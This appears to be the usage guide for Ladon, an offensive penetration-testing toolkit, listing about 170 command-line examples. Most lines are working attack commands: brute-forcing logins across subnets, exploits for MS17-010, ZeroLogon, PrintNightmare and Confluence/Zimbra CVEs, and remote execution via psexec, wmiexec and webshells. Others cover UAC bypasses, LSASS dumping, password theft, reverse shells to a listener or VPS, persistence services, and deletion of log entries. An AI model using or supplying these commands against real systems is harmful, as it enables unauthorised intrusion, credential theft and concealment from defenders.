Ladon is a multi-threaded, plugin-based comprehensive scanner for large-scale network penetration testing. It covers port scanning, service identification, network asset discovery, password brute-forcing, high-risk vulnerability detection and one-click getshell. It supports batch scanning of A-, B- and C-class segments and cross-segment ranges, as well as URL, host and domain-name lists. Version 9.2.1 has 171 built-in functional modules and 18 external modules. Through a variety of protocols and methods it can quickly obtain the target network's live host IPs, computer names, workgroups, shared resources, network card (MAC) addresses, operating system versions, websites, subdomains, middleware, open services, routers, databases and other information. Vulnerability detection covers MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, the Struts2 series and so on. There are 13 kinds of password brute-forcing: databases (MySQL, Oracle, MSSQL), FTP, SSH, VNC, Windows (LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, WinRM), BasicAuth, Tomcat, Weblogic, RAR, etc. Remote command execution includes smbexec / wmiexec / psexec / atexec / sshexec / jspshell, and the web fingerprinting module can identify 75 kinds of web application, middleware, script type and page type. It is highly customisable: plugin POCs can be written as .NET assemblies, DLLs (C# / Delphi / VC), PowerShell and other languages; any external program or command can be called in batch by configuring an INI file; and the EXP generator can produce a vulnerability POC in one click to quickly extend the scanning capability. Ladon also supports plugin scanning from Cobalt Strike to quickly expand the intranet for lateral movement.
New version: https://k8gege.org/Download
All versions: https://github.com/k8gege/Ladon/releases/
Ladon concise usage tutorial (complete document): http://k8gege.org/Ladon
Supports CMD, shell, Cobalt Strike and PowerShell.
Windows version: .NET, Cobalt Strike, PowerShell
Full-system version: Go (all platforms), Python (theoretically all platforms)
PS: the GUI version is mainly for convenient local testing; use the CMD version for the complete feature set.
Ladon 9.2.1 20220911
171 concise usage examples
Example: scan target segment 10.1.2 for the MS17010 vulnerability
Single thread: Ladon 10.1.2.8/24 MS17010 t=1
80 threads: Ladon noping 10.1.2.8/24 MS17010 t=80
On a heavily protected network the default thread count cannot scan; a single thread must be used.
Example: scan target segment 10.1.2 for the MS17010 vulnerability (noping must be added)
Ladon noping 10.1.2.8/24 MS17010
See: http://k8gege.org/Ladon/proxy.html
CIDR format: not only /24, /16 and /8 (any prefix length is supported)
Ladon 192.168.1.8/24 [ScanModule]
Ladon 192.168.1.8/16 [ScanModule]
Ladon 192.168.1.8/8 [ScanModule]
Letter format: C, B and A segments only (scanned in order)
Ladon 192.168.1.8/c [ScanModule]
Ladon 192.168.1.8/b [ScanModule]
Ladon 192.168.1.8/a [ScanModule]
Ladon 192.168.1.50-192.168.1.200 ICMP   ICMP probe for live hosts in 192.168.1.50-200
Ladon 192.168.1.30-192.168.50.80 ICMP   ICMP probe for live hosts from 192.168.1.30 to 192.168.50.80
TXT format
Ladon ip24.txt ICMP
Ladon ip16.txt ICMP
Ladon cidr.txt ICMP
Ladon domain.txt ICMP
Ladon host.txt ICMP
Ladon 192.168.1.8 WhatCMS   scan a single IP
Ladon 192.168.1.8/24 WhatCMS   scan the C segment
Ladon 192.168.1.8/c WhatCMS   scan the C segment
Ladon 192.168.1.8/b WhatCMS   scan the B segment
Ladon 192.168.1.8/a WhatCMS   scan the A segment
Ladon ip.txt WhatCMS   scan an IP list
Ladon ip24.txt WhatCMS   scan a list of C segments
Ladon ip16.txt WhatCMS   scan a list of B segments
Ladon cidr.txt WhatCMS   scan a list of IP segments (e.g. a whole country)
Disable Ping scanning
Ladon noping 192.168.1.8 WhatCMS   scan a single IP
Ladon noping 192.168.1.8/24 WhatCMS   scan the C segment
Ladon url. txt DraytekPoc
Ladon str.txt DeBase64
Ladon 192.168.1.8/24 ICMP
013 Ping: detect live hosts (calls the system ping command and echoes ms, TTL and other information)
Ladon 192.168.1.8/24 Ping
014 OnlinePC: multi-protocol live-host probe (IP, machine name, MAC / domain name, vendor / OS version)
Ladon 192.168.1.8/24 OnlinePC
015 OsScan: multi-protocol operating system identification (IP, machine name, OS version, open services)
Ladon 192.168.1.8/24 OsScan
Ladon 192.168.1.8/24 EthScan
Ladon 192.168.1.8/24 OxidScan
Ladon 192.168.1.8/24 DnsScan
Ladon 192.168.1.8/24 OnlineIP
019 MS17010: scan for the SMB vulnerability MS17-010 (IP, machine name, vulnerability number, OS version)
Ladon 192.168.1.8/24 MS17010
020 SMBGhost: detect CVE-2020-0796 (IP, machine name, vulnerability number, OS version)
Ladon 192.168.1.8/24 SMBGhost
Ladon 192.168.1.8/24 WebScan
Ladon 192.168.1.8/24 UrlScan
Ladon 192.168.1.8/24 SameWeb
Ladon baidu.com SubDomain
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
Ladon domain.txt DomainIP
Ladon host.txt HostIP
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
Ladon AdiDnsDump 192.168.1.8 (Domain IP)
Ladon GetDomainIP
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
Ladon 192.168.1.8/24 WhatCMS
Ladon 192.168.1.8/24 CiscoScan
Ladon http://192.168.1.8 CiscoScan
Ladon EnumMssql
Ladon EnumShare
Ladon 192.168.1.8/24 LdapScan
Ladon 192.168.1.8/24 FtpScan
Brute force / network authentication / weak passwords / password brute-forcing / databases / website admin panels / logins / system logins
For a detailed explanation of password brute-forcing, see the SshScan page: http://k8gege.org/Ladon/sshscan.html
Ladon 192.168.1.8/24 SmbScan
Ladon 192.168.1.8/24 WmiScan
Ladon 192.168.1.8/24 LdapScan
Ladon 192.168.1.8/24 WinrmScan.ini
Ladon 192.168.1.8/24 SmbHashScan
Ladon 192.168.1.8/24 WmiHashScan
Ladon 192.168.1.8/24 SshScan
Ladon 192.168.1.8:22 SshScan
Ladon 192.168.1.8/24 MssqlScan
Ladon 192.168.1.8/24 OracleScan
Ladon 192.168.1.8/24 MysqlScan
Ladon http://192.168.1.8:7001/console WeblogicScan
Ladon 192.168.1.8/24 WeblogicScan
Ladon 192.168.1.8/24 VncScan
Ladon 192.168.1.8/24 FtpScan
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
Ladon http://192.168.1.8/login HttpBasicScan
Ladon 192.168.1.8/24 SmbScan.ini
Ladon 192.168.1.8/24 IpcScan.ini
Ladon 192.168.1.8/24 NbtScan
Ladon 192.168.1.8/24 WinrmScan
Ladon 192.168.1.8/24 DvrScan
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/24 SMBGhost
Ladon 192.168.1.8/24 WeblogicPoc
Ladon 192.168.1.8/24 PhpStudyPoc
Ladon 192.168.1.8/24 ActivemqPoc
Ladon 192.168.1.8/24 TomcatPoc
Ladon 192.168.1.8/24 Struts2Poc
062 DraytekPoc: CVE-2020-8515 vulnerability detection, DrayTek version detection, weak-password detection
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
Ladon 192.168.1.8/24 WeblogicExp
Ladon 192.168.1.8/24 TomcatExp
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
Ladon DraytekExp http://192.168.1.8 whoami
Ladon ZeroLogon dc.k8gege.org
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
070 ForExec: run an exploit in a loop until it succeeds (Win10 "eternal black" SMBGhost CVE-2020-0796; exits on success to avoid blue-screening the target)
Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe
Ladon 123456 EnHex
Ladon 313233343536 DeHex
Ladon 123456 EnBase64
Ladon MTIzNDU2 DeBase64
Ladon FtpSniffer 192.168.1.5
Ladon HTTPSniffer 192.168.1.5
Ladon Sniffer
Ladon IISpwd
Ladon WifiPwd
Ladon FileZillaPwd
Ladon CVE-2021-36934
Ladon DumpLsass
Ladon GetIP
Ladon GetID
Ladon Recent
Ladon UsbLog
Ladon CheckDoor
Ladon AutoRun
Ladon EnumProcess
Ladon Tasklist
Ladon cmdline
Ladon cmdline cmd.exe
Ladon GetInfo
Ladon GetInfo2
Ladon NetVer
Ladon PSver
Ladon NetVersion
Ladon PSversion
Ladon Ver
Ladon Version
Ladon AllVer
Ladon AllVersion
Ladon QueryProxy
Ladon DirList   lists drives by default (all)
Ladon DirList C:\   specify a drive letter or directory
Ladon QueryAdmin
Ladon GetPipe
Ladon RdpLog
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
Ladon wmiexec 192.168.1.8 k8gege k8ge520 whoami   (usage before 8.2)
Ladon wmiexec 192.168.1.8 k8gege k8ge520 cmd whoami   (usage from 8.2 on)
Ladon wmiexec 192.168.1.8 k8gege k8ge520 b64cmd d2hvYW1p   (usage from 8.2 on)
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
Usage: Ladon JspShell type url pwd cmd
Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
Usage: Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami
Usage:
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe
Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami
Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe
Ladon whoami
Usage: Ladon bypassuac method base64cmd
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
Ladon BypassUac2 c:\1.exe
Ladon BypassUac2 c:\1.bat
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
Ladon SpoolFool poc.dll
Ladon CVE-2022-21999 poc.dll
Ladon GetSystem cmd.exe
Ladon GetSystem cmd.exe explorer
Ladon Runas user pass cmd
Ladon ms16135 whoami
Ladon BadPotato cmdline
Ladon SweetPotato cmdline
Ladon EfsPotato whoami
Ladon Open3389
Ladon ActiveAdmin
Ladon ActiveGuest
Ladon ReverseTcp 192.168.1.8 4444 nc
Ladon ReverseTcp 192.168.1.8 4444 shell
Ladon ReverseTcp 192.168.1.8 4444 meter
Ladon ReverseHttp 192.168.1.8 4444
Ladon ReverseHttps 192.168.1.8 4444
Ladon PowerCat 192.168.1.8 4444 cmd
Ladon PowerCat 192.168.1.8 4444 psh
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
Ladon netsh add 888 192.168.1.112 22
On the VPS (listen): Ladon PortTran 8000 338
On the target (forward): Ladon PortTran <intranet IP> 3389 <VPS_IP> 8000
Local connection: mstsc <VPS_IP>:338
Ladon RdpHijack 3
Ladon RdpHijack 3 console
Ladon RegAuto Test c:\123.exe
Ladon at c:\123.exe
Ladon at c:\123.exe gui
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName
Ladon 192.168.1.8/24 SnmpScan
Ladon 192.168.1.8/24 NbtInfo
Ladon 192.168.1.8/24 SmbInfo
Ladon 192.168.1.8/24 WmiInfo
Ladon 192.168.1.8/24 MssqlInfo
Ladon 192.168.1.8/24 WinrmInfo
Ladon 192.168.1.8/24 ExchangeInfo
Single thread: Ladon 192.168.1.8/24 RdpInfo f=1
Ladon EnableDotNet
Ladon gethtml http://192.168.1.1
Ladon web 80
Ladon web 80 dir
Get the external IP (start the web server on the VPS; the target requests ip.txt or ip.jpg)
Listen: Ladon web 800
Submit a string; it is returned in clear text
certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456
Base64-encode the submitted string
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Base64-decode the submitted string
certutil.exe -urlcache -split -f http://192.168.1.110:800/debase64/azhnZWdlNTIw
Ladon 192.168.1.8/24 IsShiro
Ladon LogDelTomcat access.log 192.168.1.8
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll (C#)
Ladon ReadFile C:\k8.exe (default 1K)
Ladon ReadFile c:\k8.exe 1K
Ladon ReadFile c:\k8.exe 1024K
Ladon ReadFile c:\k8.exe 1M
Ladon SetMzLogonPwd 1
Ladon SetSignAuth 1
Ladon ip.txt IP24
Ladon ip.txt IPC
Ladon ip.txt IPB
Ladon url. txt CVE-2022-26134
Ladon EXP-2022-26134 https://111.229.255.81 id
Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort
Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444
160 SslInfo certificate: detect device, IP, domain name, machine name, organization and other information
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo   specify the port
Ladon noping fbi.gov SslInfo   disable Ping detection
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
161 SslInfo certificate: batch detection of device, IP, domain name, machine name, organization and other information
Ladon ip.txt SslInfo
Ladon url.txt SslInfo
Ladon 192.168.1.1/c SslInfo
Ladon 192.168.1.1/b SslInfo
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo   disable Ping detection
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
Ladon ip.txt WPinfo
Ladon url.txt WPinfo
Ladon 192.168.1.1/c WPinfo
Ladon 192.168.1.1/b WPinfo
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8/24 ExchangeScan
Ladon 192.168.1.8 CVE-2022-27925
Ladon http://zimbra.k8gege.org CVE-2022-27925
Ladon ip.txt CVE-2022-27925
Ladon url.txt CVE-2022-27925
Ladon 192.168.1.1/c CVE-2022-27925
Ladon 192.168.1.1/b CVE-2022-27925
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami
Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
Ladon FindIP ipc.txt ISVUL.txt
Ladon https://192.168.1.8 CiscoDump
Ladon url.txt CiscoDump   batch-detect Cisco vulnerabilities and export user passwords
http://k8gege.org/Ladon/example-en.html
Latest version on the Zsxq (小密圈) community: http://k8gege.org/Ladon/update.txt